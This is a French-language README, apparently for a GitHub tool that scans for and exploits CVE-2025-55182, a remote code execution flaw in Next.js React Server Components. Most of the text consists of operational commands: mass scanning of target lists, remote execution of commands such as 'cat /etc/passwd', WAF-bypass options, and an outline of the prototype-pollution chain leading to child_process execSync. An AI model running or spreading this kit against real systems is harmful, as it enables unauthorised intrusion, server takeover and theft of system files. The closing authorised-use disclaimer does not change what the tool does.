
Kit automatisé de détection et d'exploitation pour CVE-2025-55182, une RCE critique dans Next.js React Server Components. Dispose d'une empreinte multi-couche, d'un contournement WAF et d'un scan en masse pour les tests d'intrusion.
Un outil complet de recherche en sécurité pour tester la vulnérabilité d'exécution de code à distance des composants serveur React de Next.js (CVE-2025-55182).
Cette boîte à outils fournit des capacités de détection et d'exploitation automatisées pour CVE-2025-55182, une vulnérabilité RCE critique affectant les applications Next.js utilisant les composants serveur React. La boîte à outils se compose de trois composants intégrés :
requestspip3 install requests
git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh
Le moyen le plus rapide de scanner et d'exploiter des cibles :
# Créez un fichier avec les URL cibles (une par ligne)
echo "https://example.com" > targets.txt
# Analyse et exploitation automatiques en une commande
./auto_exploit.sh -i targets.txt -s -c "id"
Identifier les applications Next.js sans exploitation :
python3 NextApp.py targets.txt
Fichiers de sortie :
confirmed_nextjs_targets.txt - Toutes les applications Next.js détectéeshigh_confidence_nextjs_targets.txt - Détections à haute confiance uniquementTester des cibles individuelles :
# Exploitation de base
./exploit.sh -d https://target.com -c "whoami"
# Avec contournement WAF
./exploit.sh -d target.com -c "cat /etc/passwd" -w
# Taille personnalisée du contournement WAF
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256
# Ignorer la vérification SSL
./exploit.sh -d https://target.com -c "id" -k
./auto_exploit.sh -i targets.txt -s -c "whoami"
# Étape 1 : Détecter les applications Next.js
python3 NextApp.py targets.txt
# Étape 2 : Exploiter les cibles confirmées
./auto_exploit.sh -c "id"
# Analyse automatique complète avec contournement WAF
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"
# Délais et délais d'attente personnalisés
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"
# Ignorer la vérification SSL en mode groupé
./auto_exploit.sh -i targets.txt -s -k -c "hostname"
python3 NextApp.py <fichier_cibles>
Arguments :
fichier_cibles - Fichier texte contenant les URL cibles (une par ligne)./exploit.sh [OPTIONS]
Options :
| Option | Description | Défaut |
|---|---|---|
-d, --domain | Domaine/URL cible | http://localhost:3000 |
-f, --file | Fichier avec la liste des cibles | - |
-c, --command | Commande à exécuter | id |
-w, --waf-bypass | Activer le contournement WAF | Désactivé |
--waf-size SIZE | Taille des données de contournement WAF (Ko) | 128 |
--timeout SECONDS | Délai d'attente de la requête | 15 |
-k, --insecure | Ignorer la vérification SSL | Désactivé |
--user-agent AGENT | User-Agent personnalisé | Mozilla/5.0... |
-h, --help | Afficher le message d'aide | - |
./auto_exploit.sh [OPTIONS]
Options :
| Option | Description | Défaut |
|---|---|---|
-i, --input FILE | Fichier d'entrée des cibles | confirmed_nextjs_targets.txt |
-o, --output FILE | Fichier de sortie des résultats | exploit_results.txt |
-c, --command CMD | Commande à exécuter | id |
-w, --waf-bypass | Activer le contournement WAF | Désactivé |
--waf-size SIZE | Taille du contournement WAF (Ko) | 128 |
--timeout SECONDS | Délai d'attente de la requête | 15 |
-k, --insecure | Ignorer la vérification SSL | Désactivé |
--delay SECONDS | Délai entre les requêtes | 2 |
-s, --scan | Analyser automatiquement pour Next.js d'abord | Désactivé |
-h, --help | Afficher le message d'aide | - |
Généré par NextApp.py - contient toutes les URL identifiées comme des applications Next.js.
Généré par NextApp.py - contient uniquement les détections Next.js à haute confiance (score de confiance 100+).
Généré par auto_exploit.sh - rapport d'exploitation complet comprenant :
Le scanner utilise plusieurs techniques de détection avec un système de notation de confiance :
x-nextjs-*, x-vercel-*x-powered-by: Next.js__NEXT_DATA__ (100 points)_next/* (25-75 points selon la quantité)__NEXT_DATA__, __NEXT_LOADED_PAGES__middlewareManifest, self.__RSC_MANIFESTSeuils de confiance :
L'exploit exploite une chaîne de pollution de prototype dans les composants serveur React de Next.js :
__proto__ via la désérialisation JSON_response._prefixprocess.mainModule.require('child_process').execSync()X-Action-RedirectLa boîte à outils inclut des capacités de contournement WAF intégrées :
Activer avec les drapeaux -w ou --waf-bypass.
# Créer la liste des cibles
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF
# Lancer le scan unifié
./auto_exploit.sh -i targets.txt -s -c "whoami"
# Consulter les résultats
cat exploit_results.txt
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256
# Étape 1 : Détecter et filtrer
python3 NextApp.py targets.txt
# Étape 2 : Exploiter uniquement les cibles à haute confiance
./auto_exploit.sh -i high_confidence_nextjs_targets.txt -c "id"
Cet outil est destiné uniquement à des fins de tests de sécurité et de recherche autorisés. Les utilisateurs doivent :
L'accès non autorisé aux systèmes informatiques est illégal. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive de cet outil.
Merci aux chercheurs en sécurité qui ont découvert et divulgué cette vulnérabilité :
Les contributions sont les bienvenues ! Veuillez :
Pour les problèmes, questions ou demandes de fonctionnalités, veuillez ouvrir un ticket sur GitHub.
Ce projet est fourni à des fins éducatives et de tests de sécurité autorisés. Utilisez-le de manière responsable et éthique.